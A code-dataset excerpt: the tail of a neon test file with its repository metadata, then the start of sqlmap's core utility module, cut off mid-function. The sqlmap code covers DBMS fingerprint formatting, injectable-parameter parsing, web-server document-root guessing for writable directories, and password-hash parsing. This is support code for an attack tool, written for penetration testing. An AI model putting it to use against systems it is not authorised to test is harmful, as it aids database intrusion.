grads_est.flat[pert_ind] = grad
# reset the perturbed input element
inp_pert.flat[pert_ind] = save_val
del rnn
return (grads_est, deltas_neon)
|
jfsantos/neon
|
tests/test_recurrent.py
|
Python
|
apache-2.0
| 10,800
|
[
"Gaussian"
] |
41bbb5146720ca5a61cda73b220df99afdc13c2021788f76e277129503ea39d0
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import codecs
import contextlib
import cookielib
import copy
import getpass
import hashlib
import httplib
import inspect
import json
import logging
import ntpath
import os
import posixpath
import random
import re
import socket
import string
import sys
import tempfile
import time
import urllib
import urllib2
import urlparse
import unicodedata
from ConfigParser import DEFAULTSECT
from ConfigParser import RawConfigParser
from StringIO import StringIO
from difflib import SequenceMatcher
from math import sqrt
from optparse import OptionValueError
from subprocess import PIPE
from subprocess import Popen as execute
from xml.dom import minidom
from xml.sax import parse
from extra.cloak.cloak import decloak
from extra.safe2bin.safe2bin import safecharencode
from lib.core.bigarray import BigArray
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.convert import base64pickle
from lib.core.convert import base64unpickle
from lib.core.convert import hexdecode
from lib.core.convert import htmlunescape
from lib.core.convert import stdoutencode
from lib.core.convert import unicodeencode
from lib.core.convert import utf8encode
from lib.core.decorators import cachedmethod
from lib.core.defaults import defaults
from lib.core.dicts import DBMS_DICT
from lib.core.dicts import DEFAULT_DOC_ROOTS
from lib.core.dicts import DEPRECATED_OPTIONS
from lib.core.dicts import SQL_STATEMENTS
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import CONTENT_STATUS
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import OS
from lib.core.enums import PLACE
from lib.core.enums import PAYLOAD
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import SORT_ORDER
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict
from lib.core.settings import BANNER
from lib.core.settings import BOLD_PATTERNS
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_DIRECTORY_DICT
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
from lib.core.settings import DESCRIPTION
from lib.core.settings import DUMMY_SQL_INJECTION_CHARS
from lib.core.settings import DUMMY_USER_INJECTION
from lib.core.settings import DYNAMICITY_MARK_LENGTH
from lib.core.settings import ERROR_PARSING_REGEXES
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
from lib.core.settings import FORM_SEARCH_REGEX
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
from lib.core.settings import GIT_PAGE
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
from lib.core.settings import HASHDB_MILESTONE_VALUE
from lib.core.settings import HOST_ALIASES
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT
from lib.core.settings import IP_ADDRESS_REGEX
from lib.core.settings import ISSUES_PAGE
from lib.core.settings import IS_WIN
from lib.core.settings import LARGE_OUTPUT_THRESHOLD
from lib.core.settings import MIN_ENCODED_LEN_CHECK
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
from lib.core.settings import ML
from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_AMP_MARKER
from lib.core.settings import PARAMETER_SEMICOLON_MARKER
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import PLATFORM
from lib.core.settings import PRINTABLE_CHAR_REGEX
from lib.core.settings import PYVERSION
from lib.core.settings import REFERER_ALIASES
from lib.core.settings import REFLECTED_BORDER_REGEX
from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
from lib.core.settings import REVISION
from lib.core.settings import SENSITIVE_DATA_REGEX
from lib.core.settings import SITE
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import TEXT_TAG_REGEX
from lib.core.settings import TIME_STDEV_COEFF
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.core.settings import URI_QUESTION_MARKER
from lib.core.settings import URLENCODE_CHAR_LIMIT
from lib.core.settings import URLENCODE_FAILSAFE_CHARS
from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import VERSION
from lib.core.settings import VERSION_STRING
from lib.core.threads import getCurrentThreadData
from lib.utils.sqlalchemy import _sqlalchemy
from thirdparty.clientform.clientform import ParseResponse
from thirdparty.clientform.clientform import ParseError
from thirdparty.magic import magic
from thirdparty.odict.odict import OrderedDict
from thirdparty.termcolor.termcolor import colored
class UnicodeRawConfigParser(RawConfigParser):
"""
RawConfigParser with unicode writing support
"""
def write(self, fp):
"""
Write an .ini-format representation of the configuration state.
"""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, getUnicode(value, UNICODE_ENCODING).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key != "__name__":
if value is None:
fp.write("%s\n" % (key))
else:
fp.write("%s = %s\n" % (key, getUnicode(value, UNICODE_ENCODING).replace('\n', '\n\t')))
fp.write("\n")
class Format(object):
@staticmethod
def humanize(values, chain=" or "):
return chain.join(values)
# Get methods
@staticmethod
def getDbms(versions=None):
"""
Format the back-end DBMS fingerprint value and return its
values formatted as a human readable string.
@return: detected back-end DBMS based upon fingerprint techniques.
@rtype: C{str}
"""
if versions is None and Backend.getVersionList():
versions = Backend.getVersionList()
return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(v for v in versions))
@staticmethod
def getErrorParsedDBMSes():
"""
Parses the knowledge base htmlFp list and return its values
formatted as a human readable string.
@return: list of possible back-end DBMS based upon error messages
parsing.
@rtype: C{str}
"""
htmlParsed = None
if len(kb.htmlFp) == 0 or kb.heuristicTest != HEURISTIC_TEST.POSITIVE:
pass
elif len(kb.htmlFp) == 1:
htmlParsed = kb.htmlFp[0]
elif len(kb.htmlFp) > 1:
htmlParsed = " or ".join(kb.htmlFp)
return htmlParsed
@staticmethod
def getOs(target, info):
"""
Formats the back-end operating system fingerprint value
and return its values formatted as a human readable string.
Example of info (kb.headersFp) dictionary:
{
'distrib': set(['Ubuntu']),
'type': set(['Linux']),
'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
'release': set(['8.10'])
}
Example of info (kb.bannerFp) dictionary:
{
'sp': set(['Service Pack 4']),
'dbmsVersion': '8.00.194',
'dbmsServicePack': '0',
'distrib': set(['2000']),
'dbmsRelease': '2000',
'type': set(['Windows'])
}
@return: detected back-end operating system based upon fingerprint
techniques.
@rtype: C{str}
"""
infoStr = ""
infoApi = {}
if info and "type" in info:
if hasattr(conf, "api"):
infoApi["%s operating system" % target] = info
else:
infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"]))
if "distrib" in info:
infoStr += " %s" % Format.humanize(info["distrib"])
if "release" in info:
infoStr += " %s" % Format.humanize(info["release"])
if "sp" in info:
infoStr += " %s" % Format.humanize(info["sp"])
if "codename" in info:
infoStr += " (%s)" % Format.humanize(info["codename"])
if "technology" in info:
if hasattr(conf, "api"):
infoApi["web application technology"] = Format.humanize(info["technology"], ", ")
else:
infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ")
if hasattr(conf, "api"):
return infoApi
else:
return infoStr.lstrip()
class Backend:
# Set methods
@staticmethod
def setDbms(dbms):
dbms = aliasToDbmsEnum(dbms)
if dbms is None:
return None
# Little precaution, in theory this condition should always be false
elif kb.dbms is not None and kb.dbms != dbms:
warnMsg = "there seems to be a high probability that "
warnMsg += "this could be a false positive case"
logger.warn(warnMsg)
msg = "sqlmap previously fingerprinted back-end DBMS as "
msg += "%s. However now it has been fingerprinted " % kb.dbms
msg += "as %s. " % dbms
msg += "Please, specify which DBMS should be "
msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
while True:
_ = readInput(msg, default=kb.dbms)
if aliasToDbmsEnum(_) == kb.dbms:
break
elif aliasToDbmsEnum(_) == dbms:
kb.dbms = aliasToDbmsEnum(_)
break
else:
warnMsg = "invalid value"
logger.warn(warnMsg)
elif kb.dbms is None:
kb.dbms = aliasToDbmsEnum(dbms)
return kb.dbms
@staticmethod
def setVersion(version):
if isinstance(version, basestring):
kb.dbmsVersion = [version]
return kb.dbmsVersion
@staticmethod
def setVersionList(versionsList):
if isinstance(versionsList, list):
kb.dbmsVersion = versionsList
elif isinstance(versionsList, basestring):
Backend.setVersion(versionsList)
else:
logger.error("invalid format of versionsList")
@staticmethod
def forceDbms(dbms, sticky=False):
if not kb.stickyDBMS:
kb.forcedDbms = aliasToDbmsEnum(dbms)
kb.stickyDBMS = sticky
@staticmethod
def flushForcedDbms(force=False):
if not kb.stickyDBMS or force:
kb.forcedDbms = None
kb.stickyDBMS = False
@staticmethod
def setOs(os):
if os is None:
return None
# Little precaution, in theory this condition should always be false
elif kb.os is not None and isinstance(os, basestring) and kb.os.lower() != os.lower():
msg = "sqlmap previously fingerprinted back-end DBMS "
msg += "operating system %s. However now it has " % kb.os
msg += "been fingerprinted to be %s. " % os
msg += "Please, specify which OS is "
msg += "correct [%s (default)/%s] " % (kb.os, os)
while True:
_ = readInput(msg, default=kb.os)
if _ == kb.os:
break
elif _ == os:
kb.os = _.capitalize()
break
else:
warnMsg = "invalid value"
logger.warn(warnMsg)
elif kb.os is None and isinstance(os, basestring):
kb.os = os.capitalize()
return kb.os
@staticmethod
def setOsVersion(version):
if version is None:
return None
elif kb.osVersion is None and isinstance(version, basestring):
kb.osVersion = version
@staticmethod
def setOsServicePack(sp):
if sp is None:
return None
elif kb.osSP is None and isinstance(sp, int):
kb.osSP = sp
@staticmethod
def setArch():
msg = "what is the back-end database management system architecture?"
msg += "\n[1] 32-bit (default)"
msg += "\n[2] 64-bit"
while True:
_ = readInput(msg, default='1')
if isinstance(_, basestring) and _.isdigit() and int(_) in (1, 2):
kb.arch = 32 if int(_) == 1 else 64
break
else:
warnMsg = "invalid value. Valid values are 1 and 2"
logger.warn(warnMsg)
return kb.arch
# Get methods
@staticmethod
def getForcedDbms():
return aliasToDbmsEnum(kb.get("forcedDbms"))
@staticmethod
def getDbms():
return aliasToDbmsEnum(kb.get("dbms"))
@staticmethod
def getErrorParsedDBMSes():
"""
Returns array with parsed DBMS names till now
This functions is called to:
1. Sort the tests, getSortedInjectionTests() - detection phase.
2. Ask user whether or not skip specific DBMS tests in detection phase,
lib/controller/checks.py - detection phase.
3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
fingerprint phase.
"""
return kb.htmlFp if kb.get("heuristicTest") == HEURISTIC_TEST.POSITIVE else []
@staticmethod
def getIdentifiedDbms():
dbms = None
if not kb:
pass
elif Backend.getForcedDbms() is not None:
dbms = Backend.getForcedDbms()
elif Backend.getDbms() is not None:
dbms = kb.dbms
elif conf.get("dbms"):
dbms = conf.dbms
elif Backend.getErrorParsedDBMSes():
dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
elif kb.get("injection") and kb.injection.dbms:
dbms = unArrayizeValue(kb.injection.dbms)
return aliasToDbmsEnum(dbms)
@staticmethod
def getVersion():
if len(kb.dbmsVersion) > 0:
return kb.dbmsVersion[0]
else:
return None
@staticmethod
def getVersionList():
if len(kb.dbmsVersion) > 0:
return kb.dbmsVersion
else:
return None
@staticmethod
def getOs():
return kb.os
@staticmethod
def getOsVersion():
return kb.osVersion
@staticmethod
def getOsServicePack():
return kb.osSP
@staticmethod
def getArch():
if kb.arch is None:
Backend.setArch()
return kb.arch
# Comparison methods
@staticmethod
def isDbms(dbms):
if Backend.getDbms() is not None:
return Backend.getDbms() == aliasToDbmsEnum(dbms)
else:
return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms)
@staticmethod
def isDbmsWithin(aliases):
return Backend.getDbms() is not None and Backend.getDbms().lower() in aliases
@staticmethod
def isVersion(version):
return Backend.getVersion() is not None and Backend.getVersion() == version
@staticmethod
def isVersionWithin(versionList):
if Backend.getVersionList() is None:
return False
for _ in Backend.getVersionList():
if _ != UNKNOWN_DBMS_VERSION and _ in versionList:
return True
return False
@staticmethod
def isVersionGreaterOrEqualThan(version):
return Backend.getVersion() is not None and str(Backend.getVersion()) >= str(version)
@staticmethod
def isOs(os):
return Backend.getOs() is not None and Backend.getOs().lower() == os.lower()
def paramToDict(place, parameters=None):
"""
Split the parameters into names and values, check if these parameters
are within the testable parameters and return in a dictionary.
"""
testableParameters = OrderedDict()
if place in conf.parameters and not parameters:
parameters = conf.parameters[place]
parameters = parameters.replace(", ", ",")
parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
if place == PLACE.COOKIE:
splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
else:
splitParams = parameters.split(conf.paramDel or DEFAULT_GET_POST_DELIMITER)
for element in splitParams:
element = re.sub(r"%s(.+?)%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), r"&\g<1>;", element)
parts = element.split("=")
if len(parts) >= 2:
parameter = urldecode(parts[0].replace(" ", ""))
if conf.paramDel and conf.paramDel == '\n':
parts[-1] = parts[-1].rstrip()
condition = not conf.testParameter
condition |= parameter in conf.testParameter
condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0
if condition:
testableParameters[parameter] = "=".join(parts[1:])
if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
_ = urldecode(testableParameters[parameter], convall=True)
if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
warnMsg = "it appears that you have provided tainted parameter values "
warnMsg += "('%s') with most probably leftover " % element
warnMsg += "chars/statements from manual SQL injection test(s). "
warnMsg += "Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg)
message = "are you sure you want to continue? [y/N] "
test = readInput(message, default="N")
if test[0] not in ("y", "Y"):
raise SqlmapSilentQuitException
elif not _:
warnMsg = "provided value for parameter '%s' is empty. " % parameter
warnMsg += "Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg)
if conf.testParameter and not testableParameters:
paramStr = ", ".join(test for test in conf.testParameter)
if len(conf.testParameter) > 1:
warnMsg = "provided parameters '%s' " % paramStr
warnMsg += "are not inside the %s" % place
logger.warn(warnMsg)
else:
parameter = conf.testParameter[0]
if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True):
debugMsg = "provided parameter '%s' " % paramStr
debugMsg += "is not inside the %s" % place
logger.debug(debugMsg)
elif len(conf.testParameter) != len(testableParameters.keys()):
for parameter in conf.testParameter:
if parameter not in testableParameters:
debugMsg = "provided parameter '%s' " % parameter
debugMsg += "is not inside the %s" % place
logger.debug(debugMsg)
if testableParameters:
for parameter, value in testableParameters.items():
if value and not value.isdigit():
for encoding in ("hex", "base64"):
try:
decoded = value.decode(encoding)
if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in string.printable for _ in decoded):
warnMsg = "provided parameter '%s' " % parameter
warnMsg += "seems to be '%s' encoded" % encoding
logger.warn(warnMsg)
break
except:
pass
return testableParameters
def getManualDirectories():
directories = None
pagePath = directoryPath(conf.path)
defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX])
if kb.absFilePaths:
for absFilePath in kb.absFilePaths:
if directories:
break
if directoryPath(absFilePath) == '/':
continue
absFilePath = normalizePath(absFilePath)
windowsDriveLetter = None
if isWindowsDriveLetterPath(absFilePath):
windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:]
absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath))
if any("/%s/" % _ in absFilePath for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES):
for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES:
_ = "/%s/" % _
if _ in absFilePath:
directories = "%s%s" % (absFilePath.split(_)[0], _)
break
if pagePath and pagePath in absFilePath:
directories = absFilePath.split(pagePath)[0]
if windowsDriveLetter:
directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories))
directories = normalizePath(directories)
if directories:
infoMsg = "retrieved the web server document root: '%s'" % directories
logger.info(infoMsg)
else:
warnMsg = "unable to retrieve automatically the web server "
warnMsg += "document root"
logger.warn(warnMsg)
directories = []
message = "what do you want to use for writable directory?\n"
message += "[1] common location(s) ('%s') (default)\n" % ", ".join(root for root in defaultDocRoot)
message += "[2] custom location(s)\n"
message += "[3] custom directory list file\n"
message += "[4] brute force search"
choice = readInput(message, default="1").strip()
if choice == "2":
message = "please provide a comma separate list of absolute directory paths: "
directories = readInput(message, default="").split(',')
elif choice == "3":
message = "what's the list file location?\n"
listPath = readInput(message, default="")
checkFile(listPath)
directories = getFileItems(listPath)
elif choice == "4":
targets = set([conf.hostname])
_ = conf.hostname.split('.')
if _[0] == "www":
targets.add('.'.join(_[1:]))
targets.add('.'.join(_[1:-1]))
else:
targets.add('.'.join(_[:-1]))
targets = filter(None, targets)
for prefix in BRUTE_DOC_ROOT_PREFIXES.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX]):
if BRUTE_DOC_ROOT_TARGET_MARK in prefix and re.match(IP_ADDRESS_REGEX, conf.hostname):
continue
for suffix in BRUTE_DOC_ROOT_SUFFIXES:
for target in targets:
item = "%s/%s" % (prefix, suffix)
item = item.replace(BRUTE_DOC_ROOT_TARGET_MARK, target).replace("//", '/').rstrip('/')
directories.append(item)
if BRUTE_DOC_ROOT_TARGET_MARK not in prefix:
break
infoMsg = "using generated directory list: %s" % ','.join(directories)
logger.info(infoMsg)
msg = "use any additional custom directories [Enter for None]: "
answer = readInput(msg)
if answer:
directories.extend(answer.split(','))
else:
directories = defaultDocRoot
return directories
def getAutoDirectories():
retVal = set()
if kb.absFilePaths:
infoMsg = "retrieved web server absolute paths: "
infoMsg += "'%s'" % ", ".join(ntToPosixSlashes(path) for path in kb.absFilePaths)
logger.info(infoMsg)
for absFilePath in kb.absFilePaths:
if absFilePath:
directory = directoryPath(absFilePath)
directory = ntToPosixSlashes(directory)
retVal.add(directory)
else:
warnMsg = "unable to automatically parse any web server path"
logger.warn(warnMsg)
_ = extractRegexResult(r"//[^/]+?(?P<result>/.*)/", conf.url) # web directory
if _:
retVal.add(_)
return list(retVal)
def filePathToSafeString(filePath):
"""
Returns string representation of a given filepath safe for a single filename usage
>>> filePathToSafeString('C:/Windows/system32')
'C__Windows_system32'
"""
retVal = filePath.replace("/", "_").replace("\\", "_")
retVal = retVal.replace(" ", "_").replace(":", "_")
return retVal
def singleTimeDebugMessage(message):
singleTimeLogMessage(message, logging.DEBUG)
def singleTimeWarnMessage(message):
singleTimeLogMessage(message, logging.WARN)
def singleTimeLogMessage(message, level=logging.INFO, flag=None):
if flag is None:
flag = hash(message)
if not conf.smokeTest and flag not in kb.singleLogFlags:
kb.singleLogFlags.add(flag)
logger.log(level, message)
def boldifyMessage(message):
retVal = message
if any(_ in message for _ in BOLD_PATTERNS):
retVal = setColor(message, True)
return retVal
def setColor(message, bold=False):
retVal = message
level = extractRegexResult(r"\[(?P<result>[A-Z ]+)\]", message) or kb.get("stickyLevel")
if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler
if bold:
retVal = colored(message, color=None, on_color=None, attrs=("bold",))
elif level:
level = getattr(logging, level, None) if isinstance(level, basestring) else level
_ = LOGGER_HANDLER.level_map.get(level)
if _:
background, foreground, bold = _
retVal = colored(message, color=foreground, on_color="on_%s" % background if background else None, attrs=("bold",) if bold else None)
kb.stickyLevel = level if message and message[-1] != "\n" else None
return retVal
def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=CONTENT_STATUS.IN_PROGRESS):
"""
Writes text to the stdout (console) stream
"""
message = ""
if not kb.get("threadException"):
if forceOutput or not getCurrentThreadData().disableStdOut:
if kb.get("multiThreadMode"):
logging._acquireLock()
if isinstance(data, unicode):
message = stdoutencode(data)
else:
message = data
if hasattr(conf, "api"):
sys.stdout.write(message, status, content_type)
else:
sys.stdout.write(setColor(message, bold))
try:
sys.stdout.flush()
except IOError:
pass
if kb.get("multiThreadMode"):
logging._releaseLock()
kb.prependFlag = isinstance(data, basestring) and (len(data) == 1 and data not in ('\n', '\r') or len(data) > 2 and data[0] == '\r' and data[-1] != '\n')
def dataToTrafficFile(data):
if not conf.trafficFile:
return
try:
conf.trafficFP.write(data)
conf.trafficFP.flush()
except IOError, ex:
errMsg = "something went wrong while trying "
errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
raise SqlmapGenericException(errMsg)
def dataToDumpFile(dumpFile, data):
dumpFile.write(data)
dumpFile.flush()
def dataToOutFile(filename, data):
retVal = None
if data:
retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
try:
with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
f.write(data)
except IOError, ex:
errMsg = "something went wrong while trying to write "
errMsg += "to the output file ('%s')" % ex
raise SqlmapGenericException(errMsg)
return retVal
def readInput(message, default=None, checkBatch=True):
"""
Reads input from terminal
"""
retVal = None
kb.stickyLevel = None
message = getUnicode(message)
if "\n" in message:
message += "%s> " % ("\n" if message.count("\n") > 1 else "")
elif message[-1] == ']':
message += " "
if kb.prependFlag:
message = "\n%s" % message
kb.prependFlag = False
if conf.get("answers"):
for item in conf.answers.split(','):
question = item.split('=')[0].strip()
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
if answer and question.lower() in message.lower():
retVal = getUnicode(answer, UNICODE_ENCODING)
infoMsg = "%s%s" % (message, retVal)
logger.info(infoMsg)
debugMsg = "used the given answer"
logger.debug(debugMsg)
break
if retVal is None:
if checkBatch and conf.get("batch"):
if isListLike(default):
options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
elif default:
options = getUnicode(default, UNICODE_ENCODING)
else:
options = unicode()
dataToStdout("\r%s%s\n" % (message, options), forceOutput=True, bold=True)
debugMsg = "used the default behaviour, running in batch mode"
logger.debug(debugMsg)
retVal = default
else:
logging._acquireLock()
dataToStdout("\r%s" % message, forceOutput=True, bold=True)
kb.prependFlag = False
try:
retVal = raw_input() or default
retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
except:
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
kb.prependFlag = True
raise SqlmapUserQuitException
finally:
logging._releaseLock()
return retVal
def randomRange(start=0, stop=1000, seed=None):
"""
Returns random integer value in given range
>>> random.seed(0)
>>> randomRange(1, 500)
423
"""
randint = random.WichmannHill(seed).randint if seed is not None else random.randint
return int(randint(start, stop))
def randomInt(length=4, seed=None):
"""
Returns random integer value with provided number of digits
>>> random.seed(0)
>>> randomInt(6)
874254
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
"""
Returns random string value with provided number of characters
>>> random.seed(0)
>>> randomStr(6)
'RNvnAv'
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
if alphabet:
retVal = "".join(choice(alphabet) for _ in xrange(0, length))
elif lowercase:
retVal = "".join(choice(string.ascii_lowercase) for _ in xrange(0, length))
else:
retVal = "".join(choice(string.ascii_letters) for _ in xrange(0, length))
return retVal
def sanitizeStr(value):
"""
Sanitizes string value in respect to newline and line-feed characters
>>> sanitizeStr('foo\\n\\rbar')
u'foo bar'
"""
return getUnicode(value).replace("\n", " ").replace("\r", "")
def checkFile(filename):
"""
Checks for file existence
"""
if filename is None or not os.path.isfile(filename):
raise SqlmapFilePathException("unable to read file '%s'" % filename)
def banner():
"""
This function prints sqlmap banner with its version
"""
_ = BANNER
if not getattr(LOGGER_HANDLER, "is_tty", False):
_ = re.sub("\033.+?m", "", _)
dataToStdout(_, forceOutput=True)
def parsePasswordHash(password):
"""
In case of Microsoft SQL Server password hash value is expanded to its components
"""
blank = " " * 8
if not password or password == " ":
password = NULL
if Backend.isDbms(DBMS.MSSQL) and password != NULL and isHexEncodedString(password):
hexPassword = password
password = "%s\n" % hexPassword
password += "%sheader: %s\n" % (blank, hexPassword[:6])
password += "%ssalt: %s\n" % (blank, hexPassword[6:14])
password += "%smixedcase: %s\n" % (blank, hexPassword[14:54])
if not Backend.isVersionWithin(("2005", "2008")):
password += "%suppercase: %s" % (blank, hexPassword[54:])
return password
def cleanQuery(query):
"""
Switch all SQL statement (alike) keywords to upper case
"""
retVal = query
for sqlStatements in SQL_STATEMENTS.values():
for sqlStatement in sqlStatements:
sqlStatementEsc = sqlStatement.replace("(", "\\(")
queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
if queryMatch and "sys_exec" not in query:
retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper())
return retVal
def setPaths():
"""
Sets absolute paths for project directories and files
"""
# sqlmap paths
paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra")
paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs")
paths.SQLMAP_SHELL_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "shell")
paths.SQLMAP_TAMPER_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "tamper")
paths.SQLMAP_WAF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "waf")
paths.SQLMAP_TXT_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "txt")
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
_ = os.path.join(os.path.expanduser("~"), ".sqlmap")
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
# sqlmap files
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt')
paths.SQL_KEYWORDS = os.path.join(paths.SQLMAP_TXT_PATH, "keywords.txt")
paths.SMALL_DICT = os.path.join(paths.SQLMAP_TXT_PATH, "smalldict.txt")
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
paths.MSSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mssql.xml")
paths.MYSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mysql.xml")
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
for path in paths.values():
